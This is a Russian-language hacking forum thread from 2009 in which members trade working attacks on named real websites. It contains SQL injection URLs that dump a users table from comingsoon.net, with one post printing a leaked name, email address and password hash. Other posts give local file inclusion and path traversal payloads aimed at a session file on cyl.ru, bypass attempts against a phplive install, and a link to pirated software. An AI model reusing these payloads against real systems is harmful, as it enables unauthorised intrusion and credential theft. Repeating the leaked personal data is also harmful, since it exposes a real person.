14.06.2009, 12:37
|
|
Постоянный
Регистрация: 15.03.2008
Сообщений: 441
Провел на форуме:
2052341
Репутация:
95
|
|
wildshaman, спасибо за помощь, но всё же хочется добить эту скулю.....
мною был слставлен следующий запрос для вывода имен таблиц: _http://www.comingsoon.net/news.php?id=1+union+select+table_name,2+from+infor mation_schema.tables+where+table_schema=%27comings o_nextra%27
но к сожалению ничего хорошего я не увидел, подскажите, в чем ошибка.....
|
|
|
14.06.2009, 13:09
|
|
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
Провел на форуме:
7215020
Репутация:
1423
|
|
jecka3000, там переменная передается в несколько запросов, в которых количество столбцов для выборки разное. Это видно по ошибке
Но там так же двойной запрос (результат выборки одного передаются в другой), что мы можем использовать в своих гнусных целях
http://www.comingsoon.net/news.php?id=56269+and+1=2+union+select+(select+con cat_ws(0x2F,name,email,password)+from+NEX_USERS+li mit+0,1),2
Вывод в ошибке
Paul Oehler/poehler@nexcess.net/$1$oXa15J8g$2idU4zZjHnXPyYDu94w2C0
UPDATE:
Сообщение от jecka3000
select+table_name,2+from+information_schema.tables
Там 4 версия - information_schema в ней нет
Последний раз редактировалось ElteRUS; 14.06.2009 в 13:32..
|
|
|
|
14.06.2009, 13:49
|
|
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293
Репутация:
4915
|
|
Я смотрю последнее время в теме тенденция всё усложнять. Двойные запросы неебические конструкции 
http://www.comingsoon.net/news.php?id=99999999+union+select+concat_ws(0x2F,n ame,email,password),1+from+NEX_USERS+limit+0,1/* |
|
|
|
14.06.2009, 21:14
|
|
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
Провел на форуме:
9098076
Репутация:
4303
|
|
Grey, просто многие относят file() и file_get_contents() к инклудам
|
|
|
|
15.06.2009, 00:21
|
|
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
Провел на форуме:
1469161
Репутация:
142
|
|
Сообщение от Spyder
Grey, просто многие относят file() и file_get_contents() к инклудам
allow_url_fopen.Не ? В статье какой-то было.Сюда относят функции: file(),file_get_contents(),fopen(),popen().Вро е все.Если стоит эта директива в ON,то можно использовать.
|
|
|
|
15.06.2009, 00:29
|
|
Постоянный
Регистрация: 28.09.2007
Сообщений: 820
Провел на форуме:
6722038
Репутация:
1385
|
|
Сообщение от Велемир
allow_url_fopen.Не ? В статье какой-то было.Сюда относят функции: file(),file_get_contents(),fopen(),popen().Вро е все.Если стоит эта директива в ON,то можно использовать.
и что ты с этим сделаешь? прочитаешь код своего шелленга удалённого? 
разве что еси в саенте eval(file($_GET[blablabla])); ну или систем(file($_GET[blablabla]); .......
|
|
|
|
15.06.2009, 01:25
|
|
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
Провел на форуме:
7215020
Репутация:
1423
|
|
Сообщение от Велемир
В статье какой-то было.
Вот эта статья https://forum.antichat.ru/thread91807.html
Сообщение от Велемир
Народ,кто-нибудь может показать пример обхода инклуда на этом сайте?
http://www.alertsite.com/phplive/image.php?l=ml'&x=1&deptid=0
l
Сделай так
http://www.alertsite.com/phplive/image.php?l=image.php/./.[...]/././.
Будет
Warning: is_dir(): Stat failed for ./web/image.php......................................... .................................................. .................................................. .................................................. .................................................. ............................. (errno=36 - File name too long)
Это phplive, там фильтрация+file_exists+is_dir. Вот этот двиг нулленный - http://rapidshare.com/files/86879595/Phplive.3.2.2.NULLED-FiXED-LOGOUT.rar
смотри сурс image.php, там правда закоментили кусок кода (видимо химичили пока делали нулл), но сайте все работает
|
|
|
|
14.06.2009, 21:23
|
|
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
Провел на форуме:
9098076
Репутация:
4303
|
|
Кстати, был тут человек в моа, Нитрокс, старички помнят. Вот мы с ним около года назад тоже спорили по поводу инклудов. Он ещё считал что при инклуде не любой файл будет выполняться как пшп-код. Так что это заблуждение очень распространено, а уж про читалки файлов я вообще молчу
|
|
|
|
14.06.2009, 22:02
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514
Репутация:
3338
|
|
2 Grey:
Код:
http://www.cyl.ru/index.php?page=3&lang=../../../../../../../../../../../../../../../../../../../../../../../../../tmp/sess_0quou9ch5ubkmtpv5cuotojhd7%00
Как бы дальше типо достаточно что-то купить типо, указать мыло и прочее и обойти фильтр |
|
|
|
14.06.2009, 22:12
|
|
Постоянный
Регистрация: 09.07.2006
Сообщений: 553
Провел на форуме:
7561206
Репутация:
1861
|
|
Сообщение от Pashkela
2 Grey:
Код:
http://www.cyl.ru/index.php?page=3&lang=../../../../../../../../../../../../../../../../../../../../../../../../../tmp/sess_0quou9ch5ubkmtpv5cuotojhd7%00
Как бы дальше типо достаточно что-то купить типо, указать мыло и прочее и обойти фильтр и?
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
